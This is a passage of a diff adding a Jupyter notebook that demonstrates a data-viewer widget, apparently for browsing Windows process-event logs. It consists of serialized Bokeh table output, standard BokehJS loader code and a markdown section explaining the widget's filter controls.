,\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362]},\"selected\":{\"id\":\"1495\"},\"selection_policy\":{\"id\":\"1496\"}},\"id\":\"1410\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1505\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1502\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1506\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1500\"},\"field\":\"EventID\",\"formatter\":{\"id\":\"1499\"},\"title\":\"EventID\",\"width\":8},\"id\":\"1435\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1508\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1507\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1501\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1509\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1503\"},\"field\":\"Computer\",\"formatter\":{\"id\":\"1502\"},\"title\":\"Computer\",\"width\":15},\"id\":\"1436\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1509\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1508\"},\"title\":\"ParentProcessName\",\"width\":73},\"id\":\"1439\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1498\"},\"field\":\"Account\",\"formatter\":{\"id\":\"1497\"},\"title\":\"Account\",\"width\":26},\"id\":\"1434\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1495\",\"type\":\"Selection\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1440\",\"type\":\"DateFormatter\"},{\"attributes\":{},\"id\":\"1504\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1503\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1501\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1440\"},\"title\":\"TimeGenerated\",\"width\":50},\"id\":\"1441\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1500\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1499\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1410\"}},\"id\":\"1431\",\"type\":\"CDSView\"},{\"attributes\":{\"editor\":{\"id\":\"1507\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1506\"},\"title\":\"CommandLine\",\"width\":125},\"id\":\"1438\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1505\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1504\"},\"title\":\"NewProcessName\",\"width\":52},\"id\":\"1437\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1496\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1498\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1497\",\"type\":\"StringFormatter\"}],\"root_ids\":[\"1432\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n",
+       "  var render_items = [{\"docid\":\"25caf126-b665-444e-a299-743f1ce3b751\",\"notebook_comms_target\":\"1510\",\"root_ids\":[\"1432\"],\"roots\":{\"1432\":\"086121c8-90e0-4c74-b890-d337ac3ad073\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1432"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "a4020984642c425391bd29b2819271f2",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Accordion(children=(VBox(children=(VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "viewer = DataViewer(data, selected_cols=columns)\n",
+    "# We're opening the \"Choose columns\" drop-down programmatically\n",
+    "# Just click on the small arrow to the left of \"Choose columns\" to open this\n",
+    "viewer.accordion.selected_index = 0\n",
+    "viewer"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Filtering the data\n",
+    "\n",
+    "You can apply multiple filters - each filter is additive, i.e. each is logically ANDed with the others.\n",
+    "\n",
+    "The \"Filter data\" drop down shows the following controls:\n",
+    "\n",
+    "Filter expression editor\n",
+    "- *Column selector* drop-down - which column you\n",
+    "   want the filter to apply to\n",
+    "- *Not* checkbox - invert the logic of the filter (for this filter item only)\n",
+    "- *Operator* drop-down - the available operators are different for string\n",
+    "  and non-string (numeric and dates)\n",
+    "- *Expression* text box - type in the expression that you want to match\n",
+    "- **Add filter** - adds the current filter items as a new filter expression to **Current filters**\n",
+    "- **Update filter** - overwrites the selected filter in **Current filters** with the current filter expression\n",
+    "\n",
+    "Current filters\n",
+    "- Select the filter expression you want to operate on from the **Filters** list\n",
+    "- **Delete filter** deletes the selected item\n",
+    "- **Clear all filters** removes all filter expressions\n",
+    "- **Apply filter** - applies the filter items to the data and updates the display"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(null);\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error(url) {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (let i = 0; i < css_urls.length; i++) {\n",
+       "      const url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error.bind(null, url);\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n",
+       "\n",
+       "    for (let i = 0; i < js_urls.length; i++) {\n",
+       "      const url = js_urls[i];\n",
+       "      const element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error.bind(null, url);\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(null);\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"a7b176c6-e8a3-485e-919d-500035a0ca26\" data-root-id=\"1608\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"9f99a709-de57-4c7f-80e9-30ace23bde13\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"auto_edit\":true,\"columns\":[{\"id\":\"1610\"},{\"id\":\"1611\"},{\"id\":\"1617\"},{\"id\":\"1612\"},{\"id\":\"1613\"},{\"id\":\"1614\"},{\"id\":\"1615\"}],\"editable\":true,\"height\":160,\"source\":{\"id\":\"1586\"},\"view\":{\"id\":\"1620\"},\"width_policy\":\"max\"},\"id\":\"1608\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1689\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1701\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1694\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1699\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1697\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1698\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1697\"},\"title\":\"NewProcessName\",\"width\":52},\"id\":\"1613\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1693\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1691\",\"type\":\"StringEditor\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\M